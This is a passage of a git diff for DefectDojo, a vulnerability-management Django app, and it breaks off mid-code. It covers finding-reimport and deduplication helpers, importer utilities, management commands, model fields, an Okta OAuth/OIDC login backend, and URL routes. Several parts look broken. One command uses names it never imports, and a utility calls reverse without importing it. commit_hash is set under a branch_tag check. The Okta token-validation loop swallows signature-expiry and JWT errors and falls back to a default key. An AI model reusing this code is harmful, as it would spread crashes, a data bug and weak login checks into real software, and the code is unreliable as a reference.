Q(hash_code=new_finding.hash_code)) | + (Q(unique_id_from_tool__isnull=False) & Q(unique_id_from_tool=new_finding.unique_id_from_tool))).order_by('id') + deduplicationLogger.debug(query.query) + return query + elif deduplication_algorithm == 'legacy': + # This is the legacy reimport behavior. Although it's pretty flawed and doesn't match the legacy algorithm for deduplication, + # this is left as is for simplicity. + # Re-writing the legacy deduplication here would be complicated and counter-productive. + # If you have use cases going through this section, you're advised to create a deduplication configuration for your parser + logger.debug("Legacy reimport. In case of issue, you're advised to create a deduplication configuration in order not to go through this section") + return Finding.objects.filter( + title=new_finding.title, + test=test, + severity=new_finding.severity, + numerical_severity=Finding.get_numerical_severity(new_finding.severity)).order_by('id') + else: + logger.error("Internal error: unexpected deduplication_algorithm: '%s' ", deduplication_algorithm) + return None + + +def update_endpoint_status(existing_finding, new_finding, user): + # New endpoints are already added in serializers.py / views.py (see comment "# for existing findings: make sure endpoints are present or created") + # So we only need to mitigate endpoints that are no longer present + # using `.all()` will mark as mitigated also `endpoint_status` with flags `false_positive`, `out_of_scope` and `risk_accepted`. This is a known issue. This is not a bug. This is a future. + existing_finding_endpoint_status_list = existing_finding.endpoint_status.all() + new_finding_endpoints_list = new_finding.unsaved_endpoints + endpoint_status_to_mitigate = list( + filter( + lambda existing_finding_endpoint_status: existing_finding_endpoint_status.endpoint not in new_finding_endpoints_list, + existing_finding_endpoint_status_list) + ) + # Determine if this can be run async + if settings.ASYNC_FINDING_IMPORT: + chunk_list = importer_utils.chunk_list(endpoint_status_to_mitigate) + # If there is only one chunk, then do not bother with async + if len(chunk_list) < 2: + mitigate_endpoint_status(endpoint_status_to_mitigate, user, kwuser=user, sync=True) + return + # First kick off all the workers + for endpoint_status_list in chunk_list: + mitigate_endpoint_status(endpoint_status_list, user, kwuser=user, sync=False) + else: + mitigate_endpoint_status(endpoint_status_to_mitigate, user, kwuser=user, sync=True) + + +@dojo_async_task +@app.task() +def mitigate_endpoint_status(endpoint_status_list, user, **kwargs): + for endpoint_status in endpoint_status_list: + logger.debug("Re-import: mitigating endpoint %s that is no longer present", str(endpoint_status.endpoint)) + endpoint_status.mitigated_by = user + endpoint_status.mitigated_time = timezone.now() + endpoint_status.mitigated = True + endpoint_status.last_modified = timezone.now() + endpoint_status.save() + + +@dojo_async_task +@app.task() +def reactivate_endpoint_status(endpoint_status_list, **kwargs): + for endpoint_status in endpoint_status_list: + logger.debug("Re-import: reactivating endpoint %s that is present in this scan", str(endpoint_status.endpoint)) + endpoint_status.mitigated_by = None + endpoint_status.mitigated_time = None + endpoint_status.mitigated = False + endpoint_status.last_modified = timezone.now() + endpoint_status.save() + + +def get_target_product_if_exists(product_name=None, product_type_name=None): + if product_name: + product = get_object_or_none(Product, name=product_name) + if product: + # product type name must match if provided + if product_type_name: + if product.prod_type.name == product_type_name: + return product + else: + return product + + return None + + +def get_target_product_type_if_exists(product_type_name=None): + if product_type_name: + return get_object_or_none(Product_Type, name=product_type_name) + else: + return None + + +def get_target_product_by_id_if_exists(product_id=None): + product = None + if product_id: + product = get_object_or_none(Product, pk=product_id) + logger.debug('Using existing product by id: %s', product_id) + return product + + +def get_target_engagement_if_exists(engagement_id=None, engagement_name=None, product=None): + if engagement_id: + engagement = get_object_or_none(Engagement, pk=engagement_id) + logger.debug('Using existing engagement by id: %s', engagement_id) + return engagement + + if not product: + # if there's no product, then for sure there's no engagement either + return None + + # engagement name is not unique unfortunately + engagement = get_last_object_or_none(Engagement, product=product, name=engagement_name) + return engagement + + +def get_target_test_if_exists(test_id=None, test_title=None, scan_type=None, engagement=None): + """ + Retrieves the target test to reimport. This can be as simple as looking up the test via the `test_id` parameter. + If there is no `test_id` provided, we lookup the latest test inside the provided engagement that satisfies + the provided scan_type and test_title. + """ + if test_id: + test = get_object_or_none(Test, pk=test_id) + logger.debug('Using existing Test by id: %s', test_id) + return test + + if not engagement: + return None + + if test_title: + return get_last_object_or_none(Test, engagement=engagement, title=test_title, scan_type=scan_type) + + return get_last_object_or_none(Test, engagement=engagement, scan_type=scan_type) + + +def get_or_create_product(product_name=None, product_type_name=None, auto_create_context=None): + # try to find the product (withing the provided product_type) + product = get_target_product_if_exists(product_name, product_type_name) + if product: + return product + + # not found .... create it + if not auto_create_context: + raise ValueError('auto_create_context not True, unable to create non-existing product') + else: + product_type, created = Product_Type.objects.get_or_create(name=product_type_name) + if created: + member = Product_Type_Member() + member.user = get_current_user() + member.product_type = product_type + member.role = Role.objects.get(is_owner=True) + member.save() + + product = Product.objects.create(name=product_name, prod_type=product_type) + member = Product_Member() + member.user = get_current_user() + member.product = product + member.role = Role.objects.get(is_owner=True) + member.save() + + return product + + +def get_or_create_engagement(engagement_id=None, engagement_name=None, product_name=None, product_type_name=None, auto_create_context=None): + # try to find the engagement (and product) + product = get_target_product_if_exists(product_name, product_type_name) + engagement = get_target_engagement_if_exists(engagement_id, engagement_name, product) + if engagement: + return engagement + + # not found .... create it + if not auto_create_context: + raise ValueError('auto_create_context not True, unable to create non-existing engagement') + else: + product = get_or_create_product(product_name, product_type_name, auto_create_context) + + if not product: + raise ValueError('no product, unable to create engagement') + + engagement = Engagement.objects.create(engagement_type="CI/CD", name=engagement_name, product=product, lead=get_current_user(), target_start=timezone.now().date(), target_end=(timezone.now() + timedelta(days=365)).date()) + + return engagement diff --git a/dojo/importers/utils.py b/dojo/importers/utils.py new file mode 100644 index 00000000000..6db2006ad88 --- /dev/null +++ b/dojo/importers/utils.py @@ -0,0 +1,194 @@ +from django.core.exceptions import ValidationError +from django.core.exceptions import MultipleObjectsReturned +from django.conf import settings +from dojo.decorators import dojo_async_task +from dojo.celery import app +from dojo.endpoint.utils import endpoint_get_or_create +from dojo.utils import max_safe +from dojo.models import IMPORT_CLOSED_FINDING, IMPORT_CREATED_FINDING, \ + IMPORT_REACTIVATED_FINDING, IMPORT_UNTOUCHED_FINDING, Test_Import, Test_Import_Finding_Action, \ + Endpoint_Status, Vulnerability_Id +import logging + + +logger = logging.getLogger(__name__) + + +def update_timestamps(test, version, branch_tag, build_id, commit_hash, now, scan_date): + if not scan_date: + scan_date = now + + if test.engagement.engagement_type == 'CI/CD': + test.engagement.target_end = max_safe([scan_date.date(), test.engagement.target_end]) + + test.target_end = max_safe([scan_date, test.target_end]) + + if version: + test.version = version + + if branch_tag: + test.branch_tag = branch_tag + test.engagement.version = version + + if build_id: + test.build_id = build_id + + if branch_tag: + test.commit_hash = commit_hash + + test.save() + test.engagement.save() + + +def update_import_history(type, active, verified, tags, minimum_severity, endpoints_to_add, version, branch_tag, + build_id, commit_hash, push_to_jira, close_old_findings, test, + new_findings=[], closed_findings=[], reactivated_findings=[], untouched_findings=[]): + logger.debug("new: %d closed: %d reactivated: %d untouched: %d", len(new_findings), len(closed_findings), len(reactivated_findings), len(untouched_findings)) + # json field + import_settings = {} + import_settings['active'] = active + import_settings['verified'] = verified + import_settings['minimum_severity'] = minimum_severity + import_settings['close_old_findings'] = close_old_findings + import_settings['push_to_jira'] = push_to_jira + import_settings['tags'] = tags + + # tags=tags TODO no tags field in api for reimport it seems + if endpoints_to_add: + import_settings['endpoints'] = [str(endpoint) for endpoint in endpoints_to_add] + + test_import = Test_Import(test=test, import_settings=import_settings, version=version, branch_tag=branch_tag, build_id=build_id, commit_hash=commit_hash, type=type) + test_import.save() + + test_import_finding_action_list = [] + for finding in closed_findings: + logger.debug('preparing Test_Import_Finding_Action for closed finding: %i', finding.id) + test_import_finding_action_list.append(Test_Import_Finding_Action(test_import=test_import, finding=finding, action=IMPORT_CLOSED_FINDING)) + for finding in new_findings: + logger.debug('preparing Test_Import_Finding_Action for created finding: %i', finding.id) + test_import_finding_action_list.append(Test_Import_Finding_Action(test_import=test_import, finding=finding, action=IMPORT_CREATED_FINDING)) + for finding in reactivated_findings: + logger.debug('preparing Test_Import_Finding_Action for reactivated finding: %i', finding.id) + test_import_finding_action_list.append(Test_Import_Finding_Action(test_import=test_import, finding=finding, action=IMPORT_REACTIVATED_FINDING)) + for finding in untouched_findings: + logger.debug('preparing Test_Import_Finding_Action for untouched finding: %i', finding.id) + test_import_finding_action_list.append(Test_Import_Finding_Action(test_import=test_import, finding=finding, action=IMPORT_UNTOUCHED_FINDING)) + + Test_Import_Finding_Action.objects.bulk_create(test_import_finding_action_list) + + return test_import + + +def construct_imported_message(scan_type, finding_count=0, new_finding_count=0, closed_finding_count=0, reactivated_finding_count=0, untouched_finding_count=0): + if finding_count: + message = f'{scan_type} processed a total of {finding_count} findings' + + if new_finding_count: + message = message + ' created %d findings' % (new_finding_count) + if closed_finding_count: + message = message + ' closed %d findings' % (closed_finding_count) + if reactivated_finding_count: + message = message + ' reactivated %d findings' % (reactivated_finding_count) + if untouched_finding_count: + message = message + ' did not touch %d findings' % (untouched_finding_count) + + message = message + "." + else: + message = 'No findings were added/updated/closed/reactivated as the findings in Defect Dojo are identical to those in the uploaded report.' + + return message + + +def chunk_list(list): + chunk_size = settings.ASYNC_FINDING_IMPORT_CHUNK_SIZE + # Break the list of parsed findings into "chunk_size" lists + chunk_list = [list[i:i + chunk_size] for i in range(0, len(list), chunk_size)] + logger.debug('IMPORT_SCAN: Split endpoints into ' + str(len(chunk_list)) + ' chunks of ' + str(chunk_size)) + return chunk_list + + +def chunk_endpoints_and_disperse(finding, test, endpoints, **kwargs): + chunked_list = chunk_list(endpoints) + # If there is only one chunk, then do not bother with async + if len(chunked_list) < 2: + add_endpoints_to_unsaved_finding(finding, test, endpoints, sync=True) + return [] + # First kick off all the workers + for endpoints_list in chunked_list: + add_endpoints_to_unsaved_finding(finding, test, endpoints_list, sync=False) + + +# Since adding a model to a ManyToMany relationship does not require an additional +# save, there is no need to keep track of when the task finishes. +@dojo_async_task +@app.task() +def add_endpoints_to_unsaved_finding(finding, test, endpoints, **kwargs): + logger.debug('IMPORT_SCAN: Adding ' + str(len(endpoints)) + ' endpoints to finding:' + str(finding)) + for endpoint in endpoints: + try: + endpoint.clean() + except ValidationError as e: + logger.warning("DefectDojo is storing broken endpoint because cleaning wasn't successful: " + "{}".format(e)) + ep = None + try: + ep, created = endpoint_get_or_create( + protocol=endpoint.protocol, + userinfo=endpoint.userinfo, + host=endpoint.host, + port=endpoint.port, + path=endpoint.path, + query=endpoint.query, + fragment=endpoint.fragment, + product=test.engagement.product) + except (MultipleObjectsReturned): + raise Exception("Endpoints in your database are broken. Please access {} and migrate them to new format or " + "remove them.".format(reverse('endpoint_migrate'))) + + eps, created = Endpoint_Status.objects.get_or_create( + finding=finding, + endpoint=ep) + if created: + eps.date = finding.date + eps.save() + + if ep and eps: + ep.endpoint_status.add(eps) + finding.endpoint_status.add(eps) + finding.endpoints.add(ep) + logger.debug('IMPORT_SCAN: ' + str(len(endpoints)) + ' imported') + + +# This function is added to the async queue at the end of all finding import tasks +# and after endpoint task, so this should only run after all the other ones are done +@dojo_async_task +@app.task() +def update_test_progress(test, **kwargs): + test.percent_complete = 100 + test.save() + + +def handle_vulnerability_ids(finding): + # Synchronize the cve field with the unsaved_vulnerability_ids + # We do this to be as flexible as possible to handle the fields until + # the cve field is not needed anymore and can be removed. + if finding.unsaved_vulnerability_ids and finding.cve: + # Make sure the first entry of the list is the value of the cve field + finding.unsaved_vulnerability_ids.insert(0, finding.cve) + elif finding.unsaved_vulnerability_ids and not finding.cve: + # If the cve field is not set, use the first entry of the list to set it + finding.cve = finding.unsaved_vulnerability_ids[0] + elif not finding.unsaved_vulnerability_ids and finding.cve: + # If there is no list, make one with the value of the cve field + finding.unsaved_vulnerability_ids = [finding.cve] + + if finding.unsaved_vulnerability_ids: + # Remove duplicates + finding.unsaved_vulnerability_ids = list(dict.fromkeys(finding.unsaved_vulnerability_ids)) + + # Add all vulnerability ids to the database + for vulnerability_id in finding.unsaved_vulnerability_ids: + Vulnerability_Id( + vulnerability_id=vulnerability_id, + finding=finding, + ).save() diff --git a/dojo/management/commands/create_endpoint_status.py b/dojo/management/commands/create_endpoint_status.py new file mode 100644 index 00000000000..8c068bba82b --- /dev/null +++ b/dojo/management/commands/create_endpoint_status.py @@ -0,0 +1,42 @@ +from django.core.management.base import BaseCommand +from django.db.models import Count +from dojo.models import Finding, Endpoint_Status + + +""" +Author: Cody Maffucci +This script will create endpoint status objects for findings and endpoints for +databases that already contain those objects. This script should only be run when +upgrading to 1.7.0>= as it is unnecessary for fresh installs +""" + + +class Command(BaseCommand): + help = 'Create status objects for Endpoints for easier tracking' + + def handle(self, *args, **options): + # Get a list of findings that have endpoints + findings = Finding.objects.annotate(count=Count('endpoints')).filter(count__gt=0) + for finding in findings: + # Get the list of endpoints on the current finding + endpoints = finding.endpoints.all() + for endpoint in endpoints: + # Superflous error checking + try: + # Create a new status for each endpoint + status, created = Endpoint_Status.objects.get_or_create( + finding=finding, + endpoint=endpoint, + ) + # Check if the status object was created, otherwise, there is nothing to do + if created: + status.date = finding.date + # Save the status object with at least one updated field + status.save() + # Attach the status to the endpoint and finding + endpoint.endpoint_status.add(status) + finding.endpoint_status.add(status) + except Exception as e: + # Something wild happened + print(e) + pass diff --git a/dojo/management/commands/rename_whitesource_findings.py b/dojo/management/commands/rename_whitesource_findings.py new file mode 100644 index 00000000000..370c0c9b971 --- /dev/null +++ b/dojo/management/commands/rename_whitesource_findings.py @@ -0,0 +1,40 @@ +from django.core.management.base import BaseCommand +from pytz import timezone +from dojo.celery import app + +locale = timezone(get_system_setting('time_zone')) + +""" +Author: Aaron Weaver +This script will update the hashcode and dedupe findings in DefectDojo: +""" + + +class Command(BaseCommand): + help = 'No input commands for dedupe findings.' + + def handle(self, *args, **options): + rename_whitesource_finding() + + +@app.task(name='rename_whitesource_finding_task') +def rename_whitesource_finding(): + whitesource_id = Test_Type.objects.get(name="Whitesource Scan").id + findings = Finding.objects.filter(found_by=whitesource_id) + findings = findings.order_by('-pk') + logger.info("######## Updating Hashcodes - deduplication is done in the background upon finding save ########") + for finding in findings: + logger.info("Updating Whitesource Finding with id: %d" % finding.id) + lib_name_begin = re.search('\\*\\*Library Filename\\*\\* : ', finding.description).span(0)[1] + lib_name_end = re.search('\\*\\*Library Description\\*\\*', finding.description).span(0)[0] + lib_name = finding.description[lib_name_begin:lib_name_end - 1] + if finding.cve is None: + finding.title = "CVE-None | " + lib_name + else: + finding.title = finding.cve + " | " + lib_name + if not finding.cwe: + logger.debug('Set cwe for finding %d to 1035 if not an cwe Number is set' % finding.id) + finding.cwe = 1035 + finding.title = finding.title.rstrip() # delete \n at the end of the title + finding.hash_code = finding.compute_hash_code() + finding.save() diff --git a/dojo/management/commands/stamp_finding_last_reviewed.py b/dojo/management/commands/stamp_finding_last_reviewed.py new file mode 100644 index 00000000000..3401b75f054 --- /dev/null +++ b/dojo/management/commands/stamp_finding_last_reviewed.py @@ -0,0 +1,79 @@ +from auditlog.models import LogEntry +from django.contrib.contenttypes.models import ContentType +from django.core.management.base import BaseCommand +from pytz import timezone + +from dojo.models import Finding +from dojo.utils import get_system_setting + +locale = timezone(get_system_setting('time_zone')) + +""" +Authors: Jay Paz +New fields last_reviewed, last_reviewed_by, mitigated_by have been added to the Finding model +This script will update all findings with a last_reviewed date of the most current date from: +1. Finding Date if no other evidence of activity is found +2. Last note added date if a note is found +3. Mitigation Date if finding is mitigated +4. Last action_log entry date if Finding has been updated + +It will update the last_reviewed_by with the current reporter. + +If mitigated it will update the mitigated_by with last_reviewed_by or current reporter if last_reviewed_by is None +""" + + +class Command(BaseCommand): + help = 'A new field last_reviewed has been added to the Finding model \n' \ + 'This script will update all findings with a last_reviewed date of the most current date from: \n' \ + '1. Finding Date if no other evidence of activity is found \n' \ + '2. Last note added date if a note is found \n' \ + '3. Mitigation Date if finding is mitigated \n' \ + '4. Last action_log entry date if Finding has been updated \n' + + def handle(self, *args, **options): + findings = Finding.objects.all().order_by('id') + for finding in findings: + save = False + if not finding.last_reviewed: + date_discovered = finding.date + last_note_date = finding.date + + if finding.notes.all(): + last_note_date = finding.notes.order_by('-date')[ + 0].date.date() + + mitigation_date = finding.date + + if finding.mitigated: + mitigation_date = finding.mitigated.date() + + last_action_date = finding.date + + try: + ct = ContentType.objects.get_for_id( + ContentType.objects.get_for_model(finding).id) + obj = ct.get_object_for_this_type(pk=finding.id) + log_entries = LogEntry.objects.filter(content_type=ct, + object_pk=obj.id).order_by( + '-timestamp') + if log_entries: + last_action_date = log_entries[0].timestamp.date() + except KeyError: + pass + + finding.last_reviewed = max( + [date_discovered, last_note_date, mitigation_date, + last_action_date]) + save = True + + if not finding.last_reviewed_by: + finding.last_reviewed_by = finding.reporter + save = True + + if finding.mitigated: + if not finding.mitigated_by: + finding.mitigated_by = finding.last_reviewed_by if finding.last_reviewed_by else finding.reporter + save = True + if save: + finding.save() diff --git a/dojo/models.py b/dojo/models.py index 57ce9c18e72..dce13a49993 100644 --- a/dojo/models.py +++ b/dojo/models.py @@ -18,6 +18,7 @@ from dateutil.relativedelta import relativedelta from django import forms from django.conf import settings +from auditlog.registry import auditlog from django.contrib import admin from django.contrib.auth import get_user_model from django.contrib.auth.models import Group @@ -918,6 +919,10 @@ def calc_health(self): def unaccepted_open_findings(self): return Finding.objects.filter(risk_accepted=False, active=True, duplicate=False, test__engagement__product__prod_type=self) + def get_absolute_url(self): + from django.urls import reverse + return reverse('product_type', args=[str(self.id)]) + class Product_Line(models.Model): name = models.CharField(max_length=300) @@ -1357,6 +1362,9 @@ def violates_sla(self): sla_expiration_date__lt=timezone.now().date()) return findings.count() > 0 + @property + def get_product_type(self): + return self.prod_type if self.prod_type is not None else 'unknown' class Product_Member(models.Model): product = models.ForeignKey(Product, on_delete=models.CASCADE) @@ -3659,6 +3667,10 @@ class Finding_Template(models.Model): references = models.TextField(null=True, blank=True, db_column="refs") last_used = models.DateTimeField(null=True, editable=False) numerical_severity = models.CharField(max_length=4, null=True, blank=True, editable=False) + template_match = models.BooleanField(default=False, verbose_name=_('Template Match Enabled'), help_text=_("Enables this template for matching remediation advice. Match will be applied to all active, verified findings by CWE.")) + template_match_title = models.BooleanField(default=False, verbose_name=_('Match Template by Title and CWE'), help_text=_('Matches by title text (contains search) and CWE.')) + + tags = TagField(blank=True, force_lowercase=True, help_text=_("Add tags that help describe this finding template. Choose from the list or add new tags. Press Enter key to add.")) # Remediation planning fields fix_available = models.BooleanField(null=True, blank=True, help_text=_("Indicates if a fix is available for this vulnerability type")) @@ -3728,6 +3740,38 @@ def endpoints(self): # Parse newline-separated string, remove empty lines return [line.strip() for line in self.endpoints_text.split("\n") if line.strip()] + def get_absolute_url(self): + from django.urls import reverse + return reverse('edit_template', args=[str(self.id)]) + + @cached_property + def vulnerability_ids(self): + # Get vulnerability ids from database and convert to list of strings + vulnerability_ids_model = self.vulnerability_id_template_set.all() + vulnerability_ids = list() + for vulnerability_id in vulnerability_ids_model: + vulnerability_ids.append(vulnerability_id.vulnerability_id) + + # Synchronize the cve field with the unsaved_vulnerability_ids + # We do this to be as flexible as possible to handle the fields until + # the cve field is not needed anymore and can be removed. + if vulnerability_ids and self.cve: + # Make sure the first entry of the list is the value of the cve field + vulnerability_ids.insert(0, self.cve) + elif not vulnerability_ids and self.cve: + # If there is no list, make one with the value of the cve field + vulnerability_ids = [self.cve] + + # Remove duplicates + vulnerability_ids = list(dict.fromkeys(vulnerability_ids)) + + return vulnerability_ids + + +class Vulnerability_Id_Template(models.Model): + finding_template = models.ForeignKey(Finding_Template, editable=False, on_delete=models.CASCADE) + vulnerability_id = models.TextField(max_length=50, blank=False, null=False) + class Check_List(models.Model): session_management = models.CharField(max_length=50, default="none") @@ -4335,6 +4379,7 @@ class Meta: ordering = ["name"] + class Tool_Product_History(models.Model): product = models.ForeignKey(Tool_Product_Settings, editable=False, on_delete=models.CASCADE) last_scan = models.DateTimeField(null=False, editable=False, default=now) @@ -4356,6 +4401,7 @@ class Meta: ordering = ["-created"] + class Cred_User(models.Model): name = models.CharField(max_length=200, null=False) username = models.CharField(max_length=200, null=False) diff --git a/dojo/okta.py b/dojo/okta.py new file mode 100644 index 00000000000..e600668b397 --- /dev/null +++ b/dojo/okta.py @@ -0,0 +1,103 @@ +""" +Author: selten +Taken from Pull Request #333 of +python-social-auth/socail-core + +""" +from six.moves.urllib.parse import urljoin +from jose import jwt +from jose.jwt import JWTError, ExpiredSignatureError +from social_core.utils import append_slash +from social_core.backends.oauth import BaseOAuth2 +from social_core.backends.open_id_connect import OpenIdConnectAuth + + +class OktaMixin(object): + def api_url(self): + return append_slash(self.setting('API_URL')) + + def authorization_url(self): + return self._url('v1/authorize') + + def access_token_url(self): + return self._url('v1/token') + + def _url(self, path): + return urljoin(append_slash(self.setting('API_URL')), path) + + def oidc_config(self): + return self.get_json(self._url('/.well-known/openid-configuration?client_id=' + self.setting('KEY'))) + + +class OktaOAuth2(OktaMixin, BaseOAuth2): + """Okta OAuth authentication backend""" + name = 'okta-oauth2' + REDIRECT_STATE = False + ACCESS_TOKEN_METHOD = 'POST' + SCOPE_SEPARATOR = ' ' + + DEFAULT_SCOPE = [ + 'openid', 'profile' + ] + EXTRA_DATA = [ + ('refresh_token', 'refresh_token', True), + ('expires_in', 'expires'), + ('token_type', 'token_type', True) + ] + + def get_user_details(self, response): + """Return user details from Okta account""" + return {'username': response.get('preferred_username'), + 'email': response.get('preferred_username') or '', + 'first_name': response.get('given_name'), + 'last_name': response.get('family_name')} + + def user_data(self, access_token, *args, **kwargs): + """Loads user data from Okta""" + return self.get_json( + self._url('v1/userinfo'), + headers={ + 'Authorization': 'Bearer %s' % access_token, + } + ) + + +class OktaOpenIdConnect(OktaOAuth2, OpenIdConnectAuth): + """Okta OpenID-Connect authentication backend""" + name = 'okta-openidconnect' + REDIRECT_STATE = False + ACCESS_TOKEN_METHOD = 'POST' + RESPONSE_TYPE = 'code' + + def validate_and_return_id_token(self, id_token, access_token): + """ + Validates the id_token using Okta. + """ + client_id, client_secret = self.get_key_and_secret() + claims = None + k = None + + for key in self.get_jwks_keys(): + try: + jwt.decode(id_token, key, audience=client_id, access_token=access_token) + k = key + break + except ExpiredSignatureError: + k = key + break + except JWTError as e: + if k is None and client_id == 'a-key': + k = self.get_jwks_keys()[0] + pass + + claims = jwt.decode( + id_token, + k, + audience=client_id, + issuer=self.id_token_issuer(), + access_token=access_token + ) + + self.validate_claims(claims) + + return claims diff --git a/dojo/product/urls.py b/dojo/product/urls.py new file mode 100644 index 00000000000..7922594422b --- /dev/null +++ b/dojo/product/urls.py @@ -0,0 +1,69 @@ +from django.conf.urls import url + +from dojo.product import views + +urlpatterns = [ + # product + url(r'^product$', views.product, name='product'), + url(r'^product/(?P\d+)$', views.view_product, + name='view_product'), + url(r'^product/(?P\d+)/components$', views.view_product_components, + name='view_product_components'), + url(r'^product/(?P\d+)/engagements$', views.view_engagements, + name='view_engagements'), + url(r'^product/(?P\d+)/import_scan_results$', + views.import_scan_results_prod, name='import_scan_results_prod'), + url(r'^product/(?P\d+)/metrics$', views.view_product_metrics, + name='view_product_metrics'), + url(r'^product/(?P\d+)/edit$', views.edit_product, + name='edit_product'), + url(r'^product/(?P\d+)/delete$', views.delete_product, + name='delete_product'), + url(r'^product/add', views.new_product, name='new_product'), + url(r'^product/(?P\d+)/new_engagement$', views.new_eng_for_app, + name='new_eng_for_prod'), + url(r'^product/(?P\d+)/new_technology$', views.new_tech_for_prod, + name='new_tech_for_prod'), + url(r'^technology/(?P\d+)/edit$', views.edit_technology, + name='edit_technology'), + url(r'^technology/(?P\d+)/delete$', views.delete_technology, + name='delete_technology'), + url(r'^product/(?P\d+)/new_engagement/cicd$', views.new_eng_for_app_cicd, + name='new_eng_for_prod_cicd'), + url(r'^product/(?P\d+)/add_meta_data$', views.add_meta_data, + name='add_meta_data'), + url(r'^product/(?P\d+)/edit_notifications$', views.edit_notifications, + name='edit_notifications'), + url(r'^product/(?P\d+)/edit_meta_data$', views.edit_meta_data, + name='edit_meta_data'), + url(r'^product/(?P\d+)/ad_hoc_finding$', views.ad_hoc_finding, + name='ad_hoc_finding'), + url(r'^product/(?P\d+)/engagement_presets$', views.engagement_presets, + name='engagement_presets'), + url(r'^product/(?P\d+)/engagement_presets/(?P\d+)/edit$', views.edit_engagement_presets, + name='edit_engagement_presets'), + url(r'^product/(?P\d+)/engagement_presets/add$', views.add_engagement_presets, + name='add_engagement_presets'), + url(r'^product/(?P\d+)/engagement_presets/(?P\d+)/delete$', views.delete_engagement_presets, + name='delete_engagement_presets'), + url(r'^product/(?P\d+)/add_member$', views.add_product_member, + name='add_product_member'), + url(r'^product/member/(?P\d+)/edit$', views.edit_product_member, + name='edit_product_member'), + url(r'^product/member/(?P\d+)/delete$', views.delete_product_member, + name='delete_product_member'), + url(r'^product/(?P\d+)/add_api_scan_configuration$', views.add_api_scan_configuration, + name='add_api_scan_configuration'), + url(r'^product/(?P\d+)/view_api_scan_configurations$', views.view_api_scan_configurations, + name='view_api_scan_configurations'), + url(r'^product/(?P\d+)/edit_api_scan_configuration/(?P\d+)$', views.edit_api_scan_configuration, + name='edit_api_scan_configuration'), + url(r'^product/(?P\d+)/delete_api_scan_configuration/(?P\d+)$', views.delete_api_scan_configuration, + name='delete_api_scan_configuration'), + url(r'^product/(?P\d+)/add_group$', views.add_product_group, + name='add_product_group'), + url(r'^product/group/(?P\d+)/edit$', views.edit_product_group, + name='edit_product_group'), + url(r'^product/group/(?P\d+)/delete$', views.delete_product_group, + name='delete_product_group'), +] diff --git a/dojo/product/views.py b/dojo/product/views.py old mode 100644 new mode 100755 diff --git a/dojo/product_type/urls.py b/dojo/product_type/urls.py new file mode 100644 index 00000000000..6a2a3ddf8a1 --- /dev/null +++ b/dojo/product_type/urls.py @@ -0,0 +1,32 @@ +from django.conf.urls import url + +from dojo.product_type import views +from dojo.product import views as product_views + +urlpatterns = [ + # product type + url(r'^product/type$', views.product_type, name='product_type'), + url(r'^product/type/(?P\d+)$', + views.view_product_type, name='view_product_type'), + url(r'^product/type/(?P\d+)/edit$', + views.edit_product_type, name='edit_product_type'), + url(r'^product/type/(?P\d+)/delete$', + views.delete_product_type, name='delete_product_type'), + url(r'^product/type/add$', views.add_product_type, + name='add_product_type'), + url(r'^product/type/(?P\d+)/add_product', + product_views.new_product, + name='add_product_to_product_type'), + url(r'^product/type/(?P\d+)/add_member$', views.add_product_type_member, + name='add_product_type_member'), + url(r'^product/type/member/(?P\d+)/edit$', views.edit_product_type_member, + name='edit_product_type_member'), + url(r'^product/type/member/(?P\d+)/delete$', views.delete_product_type_member, + name='delete_product_type_member'), + url(r'^product/type/(?P\d+)/add_group$', views.add_product_type_group, + name='add_product_type_group'), + url(r'^product/type/group/(?P\d+)/edit$', views.edit_product_type_group, + name='edit_product_type_group'), + url(r'^product/type/group/(?P\d+)/delete$', views.delete_product_type_group, + name='delete_product_type_group') +] diff --git a/dojo/rules/__init__.py b/dojo/rules/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/rules/urls.py b/dojo/rules/urls.py new file mode 100644 index 00000000000..7e97164ad37 --- /dev/null +++ b/dojo/rules/urls.py @@ -0,0 +1,12 @@ +from django.conf.urls import url +from dojo.rules import views + +urlpatterns = [ + url(r'^rules', views.rules, name='rules'), + url(r'^rule/add', views.new_rule, name='Add Rule'), + url(r'^rule/(?P\d+)/edit$', views.edit_rule, + name='Edit Rule'), + url(r'^rule/(?P\d+)/add_child', views.add_child, + name='Add Child'), + url(r'^rule/(?P\d+)/delete$', views.delete_rule, + name='Delete Rule'), ] diff --git a/dojo/rules/views.py b/dojo/rules/views.py new file mode 100644 index 00000000000..8de0563ab2b --- /dev/null +++ b/dojo/rules/views.py @@ -0,0 +1,166 @@ +# Standard library imports +import json +import logging + +# Third party imports +from django.contrib import messages +from django.urls import reverse +from django.http import HttpResponseRedirect +from django.shortcuts import render, get_object_or_404 +from django.contrib.admin.utils import NestedObjects +from django.db import DEFAULT_DB_ALIAS + +# Local application/library imports +from dojo.models import Rule,\ + System_Settings, Finding, Test, Test_Type, Engagement, \ + Product, Product_Type, Child_Rule +from dojo.forms import RuleFormSet, DeleteRuleForm, RuleForm +from dojo.utils import add_breadcrumb +from dojo.authorization.authorization_decorators import user_is_configuration_authorized + +logger = logging.getLogger(__name__) + +# Fields for each model ruleset + +finding_fields = [f.name for f in Finding._meta.fields] +test_fields = [f.name for f in Test._meta.fields] +test_type_fields = [f.name for f in Test_Type._meta.fields] +engagement_fields = [f.name for f in Engagement._meta.fields] +product_fields = [f.name for f in Product._meta.fields] +product_type_fields = [f.name for f in Product_Type._meta.fields] +field_dictionary = {} +field_dictionary['Finding'] = finding_fields +field_dictionary['Test Type'] = test_type_fields +field_dictionary['Test'] = test_fields +field_dictionary['Engagement'] = engagement_fields +field_dictionary['Product'] = product_fields +field_dictionary['Product Type'] = product_type_fields + + +@user_is_configuration_authorized('dojo.view_rule', 'superuser') +def rules(request): + initial_queryset = Rule.objects.all().order_by('name') + add_breadcrumb(title="Rules", top_level=True, request=request) + return render(request, 'dojo/rules.html', { + 'name': 'Rules List', + 'metric': False, + 'user': request.user, + 'rules': initial_queryset}) + + +@user_is_configuration_authorized('dojo.add_rule', 'superuser') +def new_rule(request): + if request.method == 'POST': + form = RuleForm(request.POST) + if form.is_valid(): + rule = form.save() + messages.add_message(request, + messages.SUCCESS, + 'Rule created successfully.', + extra_tags='alert-success') + if "_Add Child" in request.POST: + return HttpResponseRedirect(reverse('Add Child', args=(rule.id,))) + return HttpResponseRedirect(reverse('rules')) + form = RuleForm() + add_breadcrumb(title="New Dojo Rule", top_level=False, request=request) + return render(request, 'dojo/new_rule2.html', + {'form': form, + 'finding_fields': finding_fields, + 'test_fields': test_fields, + 'engagement_fields': engagement_fields, + 'product_fields': product_fields, + 'product_type_fields': product_type_fields, + 'field_dictionary': 